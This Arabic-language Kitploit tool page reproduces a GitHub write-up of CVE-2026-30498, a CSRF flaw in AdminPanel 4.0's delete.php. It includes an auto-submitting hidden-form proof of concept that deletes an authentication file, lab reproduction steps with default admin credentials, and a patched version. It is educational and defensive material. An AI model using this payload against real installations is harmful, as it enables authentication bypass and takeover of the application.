Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-30498 — عرض تعليمي لثغرة CSRF في بيئة مختبرية خاضعة للتحكم، بما في ذلك استغلال إثبات المفهوم ونسخة مُصلحة مع حمايات CSRF مناسبة. | Kitploit
أدوات/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

عرض تعليمي لثغرة CSRF في بيئة مختبرية خاضعة للتحكم، بما في ذلك استغلال إثبات المفهوم ونسخة مُصلحة مع حمايات CSRF مناسبة.

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-30498 – ثغرة CSRF (AdminPanel 4.0)


نظرة عامة

معرف CVE: CVE-2026-30498 (محجوز من قبل MITRE)
مكتشف الثغرة: مهدي بن حمود

توجد ثغرة تزوير الطلبات عبر المواقع (CSRF) في نقطة النهاية delete.php في AdminPanel 4.0.

تسمح هذه الثغرة للمهاجم بتفعيل إجراءات حساسة (حذف ملفات) نيابة عن مستخدم مُصادق عليه دون موافقته.


التفاصيل الفنية

سبب الثغرة هو غياب حمايات CSRF:

  • لا يوجد تحقق من رمز CSRF
  • لا يوجد تحقق من Origin / Referer
  • إجراء حساس مكشوف عبر طلب GET
  • لا يوجد تحقق من نية المستخدم

تعالج نقطة النهاية الضعيفة الطلبات مباشرة بناءً على جلسة المستخدم دون التحقق من مصدر الطلب.


التأثير

يؤدي الاستغلال الناجح إلى:

  • حذف verifyPanel.php
  • تجاوز المصادقة
  • دخول التطبيق في وضع الإعداد
  • إمكانية إعادة تهيئة النظام بالكامل

الإصدار المتأثر

  • AdminPanel 4.0 والإصدارات السابقة (مشروع مؤرشف)

سيناريو الهجوم

يستضيف المهاجم صفحة ويب خبيثة ترسل طلبًا مزورًا:

root@kitploit:~
http://localhost:8080/delete.php?file=verifyPanel.php

عندما يزور الضحية (مستخدم مُصادق عليه) هذه الصفحة، يقوم المتصفح تلقائيًا بتضمين ملفات تعريف الارتباط الخاصة بالجلسة، ويتم تنفيذ الطلب.


إثبات المفهوم (PoC)

الصفحة الخبيثة (المهاجم)

root@kitploit:~
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
  <input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
  document.getElementById("csrfForm").submit();
</script>

يتم إرسال هذا الطلب تلقائيًا مع ملف تعريف ارتباط الجلسة الخاص بالضحية.


خطوات إعادة الإنتاج

  1. تشغيل خادم الضحية:
root@kitploit:~
php -S localhost:8080
  1. الوصول إلى صفحة تسجيل الدخول:
root@kitploit:~
http://localhost:8080
  1. تسجيل الدخول باستخدام:
root@kitploit:~
admin / admin123
  1. فتح صفحة المهاجم:
root@kitploit:~
http://localhost:8081/evil.html
  1. إطلاق هجوم CSRF
  2. العودة إلى لوحة التحكم:
root@kitploit:~
/panel/dashboard.php

ما يحدث داخليًا

  1. تسجيل دخول الضحية → يتم إنشاء ملف تعريف ارتباط الجلسة
  2. صفحة المهاجم ترسل طلبًا مزورًا
  3. المتصفح يرفق ملف تعريف الارتباط تلقائيًا
  4. الخادم ينفذ الحذف دون تحقق
  5. النظام يكتشف ملف المصادقة المفقود
  6. التطبيق يدخل في وضع الإعداد

بيئة المختبر (محاكاة تعليمية)

يتضمن هذا المستودع بيئة مختبر خاضعة للتحكم لإعادة إنتاج الثغرة بأمان.

مهم: هذا المختبر عبارة عن محاكاة ولا يمثل قاعدة كود AdminPanel الأصلية بدقة.

إعادة تعيين المختبر

لإعادة تعيين البيئة:

root@kitploit:~
/reset.php

الإصدار المُصلح (التخفيف)

يتم تنفيذ نسخة آمنة في:

root@kitploit:~
delete_fixed.php

الحمايات المضافة:

  • ✅ التحقق من رمز CSRF
  • ✅ طريقة POST فقط
  • ✅ التحقق من Origin / Referer
  • ✅ التحقق من الجلسة

لماذا يعمل الإصلاح

  • لا يمكن للمهاجم الوصول إلى رمز CSRF (سياسة Same-Origin)
  • الطلبات المزورة تفتقر إلى رمز صالح → يتم رفضها
  • الطلبات عبر النطاقات محظورة عبر فحص Origin

هيكل المشروع

root@kitploit:~
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
    └── dashboard.php

attacker/
└── evil.html

إخلاء مسؤولية

هذا المشروع مخصص لأغراض تعليمية وبحثية فقط.
لا تستخدم هذه الثغرة على الأنظمة دون الحصول على إذن مناسب.

تنزيل الأداة